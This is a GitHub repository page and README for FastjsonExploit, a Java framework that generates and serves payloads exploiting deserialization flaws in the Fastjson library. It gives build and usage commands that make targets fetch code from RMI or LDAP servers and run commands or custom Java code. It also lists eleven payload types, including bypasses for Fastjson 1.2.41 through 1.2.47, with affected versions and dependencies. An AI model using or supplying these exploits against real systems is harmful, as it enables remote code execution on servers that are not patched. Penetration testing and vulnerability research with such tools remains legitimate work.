Skip to content
Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)
Java Smarty
Branch: master
Clone or download
Latest commit 665b6f6 Jul 20, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
src 提一次提交 Jul 20, 2019
.gitignore 说明payload影响版本信息不一定正确问题 Jul 20, 2019
FastjsonExploit.iml 提一次提交 Jul 20, 2019
README.md 更新REAME.md Jul 20, 2019
pom.xml 提一次提交 Jul 20, 2019

README.md

FastjonExploit | Fastjson漏洞快速利用框架

0x01 Introduce

FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:

  1. 一键生成利用payload,并启动所有利用环境。
  2. 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)

0x02 Buiding

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

0x03 Usage



.---- -. -. .  .   .
   ( .',----- - - ' '
    \_/      ;--:-\         __--------------------__
   __U__n_^_''__[. |ooo___  | |_!_||_!_||_!_||_!_| |
 c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |
 ,_\___________'_|,L______],|______________________|
/;_(@)(@)==(@)(@)   (o)(o)      (o)^(o)--(o)^(o)

FastjsonExploit is a Fastjson library vulnerability exploit framework
                Author:c0ny1<root@gv7.me>


Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]
Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc"
Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java"
Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc"
Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java"

Available payload types:
    Payload                PayloadType VulVersion      Dependencies                                      
    -------                ----------- ----------      ------------                                      
    BasicDataSource1       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
    BasicDataSource2       local       1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4
    JdbcRowSetImpl1        jndi        1.2.2.1-1.2.2.4                                                   
    JdbcRowSetImpl2        jndi        1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass                            
    JdbcRowSetImpl3        jndi        1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass                            
    JdbcRowSetImpl4        jndi        1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass                            
    JdbcRowSetImpl5        jndi        1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass                            
    JndiDataSourceFactory1 jndi        1.2.2.1-1.2.2.4 ibatis-core:3.0                                   
    SimpleJndiBeanFactory1 jndi        1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE                      
    TemplatesImpl1         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)   
    TemplatesImpl2         local       1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField)  

0x04 Notice

  • 帮助信息所说明的payload可利用的Fastjson版本,不一定正确。后续测试更正!

0x05 Reference

You can’t perform that action at this time.